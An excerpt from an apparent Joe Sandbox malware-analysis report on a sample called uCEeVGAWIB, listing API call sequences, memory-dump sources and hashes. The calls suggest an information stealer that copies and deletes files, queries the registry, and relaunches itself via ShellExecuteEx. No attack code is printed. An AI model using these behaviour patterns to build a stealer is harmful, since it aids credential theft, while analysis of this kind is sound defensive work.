                                                • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0082799B
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 008279A2
                                                • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00827920), ref: 008279C2
                                                • RegQueryValueExA.ADVAPI32(00827920,00420AAC,00000000,00000000,?,000000FF), ref: 008279E1
                                                • RegCloseKey.ADVAPI32(00827920), ref: 008279EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                • String ID:
                                                • API String ID: 3225020163-0
                                                • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                • Instruction ID: 21930021dbdf45731cba6800dee5d36ec44e8c73524c58fb597957c36bd37f5d
                                                • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                • Instruction Fuzzy Hash: 9501F4B9A40308FFEB10DFE4DC4AFAEB7B9EB44701F104559FA05A7281D67555408F51
                                                APIs
                                                • StrStrA.SHLWAPI(008C92B0,?,?,?,0041140C,?,008C92B0,00000000), ref: 0041926C
                                                • lstrcpyn.KERNEL32(0064AB88,008C92B0,008C92B0,?,0041140C,?,008C92B0), ref: 00419290
                                                • lstrlenA.KERNEL32(?,?,0041140C,?,008C92B0), ref: 004192A7
                                                • wsprintfA.USER32 ref: 004192C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpynlstrlenwsprintf
                                                • String ID: %s%s
                                                • API String ID: 1206339513-3252725368
                                                • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0081151B
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00811522
                                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0081153E
                                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0081155C
                                                • RegCloseKey.ADVAPI32(?), ref: 00811566
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                • String ID:
                                                • API String ID: 3225020163-0
                                                • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                • Instruction ID: a6f52a24ee0a9c68a31dc6ef55aaffc41d7346dcfe37cebe33a6ef74c71d3db3
                                                • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                • Instruction Fuzzy Hash: A30131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                • String ID:
                                                • API String ID: 3466090806-0
                                                • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                APIs
                                                • __getptd.LIBCMT ref: 0082C9B5
                                                  • Part of subcall function 0082C206: __getptd_noexit.LIBCMT ref: 0082C209
                                                  • Part of subcall function 0082C206: __amsg_exit.LIBCMT ref: 0082C216
                                                • __getptd.LIBCMT ref: 0082C9CC
                                                • __amsg_exit.LIBCMT ref: 0082C9DA
                                                • __lock.LIBCMT ref: 0082C9EA
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0082C9FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                                • Instruction ID: bd4a05061a5bdcf5569229c429a318c2006324fd71cf545ad8e0a6255e14e696
                                                • Opcode Fuzzy Hash: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                                • Instruction Fuzzy Hash: 4FF06D32A41734DBD620BBAC780372D37A0FF00764F50414AE814E61D2DB6459D09B9B
                                                APIs
                                                • __getptd.LIBCMT ref: 0041C74E
                                                  • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                  • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                • __getptd.LIBCMT ref: 0041C765
                                                • __amsg_exit.LIBCMT ref: 0041C773
                                                • __lock.LIBCMT ref: 0041C783
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                                • Instruction ID: 747b7d94d78dcab7bc4ad9ba185e37b4c367e78d81b7dca89f1d9f587bf674ed
                                                • Opcode Fuzzy Hash: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                                • Instruction Fuzzy Hash: EBF09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                                                APIs
                                                • StrCmpCA.SHLWAPI(00000000,008998B0), ref: 0041079A
                                                • StrCmpCA.SHLWAPI(00000000,008998C0), ref: 00410866
                                                • StrCmpCA.SHLWAPI(00000000,00899890), ref: 0041099D
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy
                                                • String ID: `_A
                                                • API String ID: 3722407311-2339250863
                                                • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                APIs
                                                • StrCmpCA.SHLWAPI(00000000,008998B0), ref: 0041079A
                                                • StrCmpCA.SHLWAPI(00000000,008998C0), ref: 00410866
                                                • StrCmpCA.SHLWAPI(00000000,00899890), ref: 0041099D
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy
                                                • String ID: `_A
                                                • API String ID: 3722407311-2339250863
                                                • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 008268CA
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0082698D
                                                • ExitProcess.KERNEL32 ref: 008269BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                • String ID: <
                                                • API String ID: 1148417306-4251816714
                                                • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                • Instruction ID: 70ccc2915f5a38736c72e7126b2a1c9c3396e4fefb71d9f0ffee8aebf461afee
                                                • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                • Instruction Fuzzy Hash: B73126B1901228ABDB18EB94ED96FDEB778FF14300F404199F205A6191DF746B88CF5A
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                • ExitProcess.KERNEL32 ref: 00416755
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                • String ID: <
                                                • API String ID: 1148417306-4251816714
                                                • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID: @Jn@$Jn@$Jn@
                                                • API String ID: 544645111-1180188686
                                                • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                APIs
                                                • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcatlstrcpy
                                                • String ID: vI@$vI@
                                                • API String ID: 3905823039-1245421781
                                                • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                • wsprintfW.USER32 ref: 00418D78
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocProcesswsprintf
                                                • String ID: %hs
                                                • API String ID: 659108358-2783943728
                                                • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                APIs
                                                • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseFileNextlstrcat
                                                • String ID: !=A$P2#v
                                                • API String ID: 3840410801-2183312394
                                                • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081A548
                                                • lstrlen.KERNEL32(00000000,00000000), ref: 0081A666
                                                • lstrlen.KERNEL32(00000000), ref: 0081A923
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 0081A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0081A094
                                                • DeleteFileA.KERNEL32(00000000), ref: 0081A9AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                • String ID:
                                                • API String ID: 257331557-0
                                                • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                • Instruction ID: 58b49278c937a6cd378b969b1c08d19b5cb5deaf2f543ec4da18c2a4c465ba5e
                                                • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                • Instruction Fuzzy Hash: 51E1BD72910128DBCB09EBA8ED92DEE7379FF14700F508159F156F2491EE346A88CB63
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                • String ID:
                                                • API String ID: 257331557-0
                                                • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED
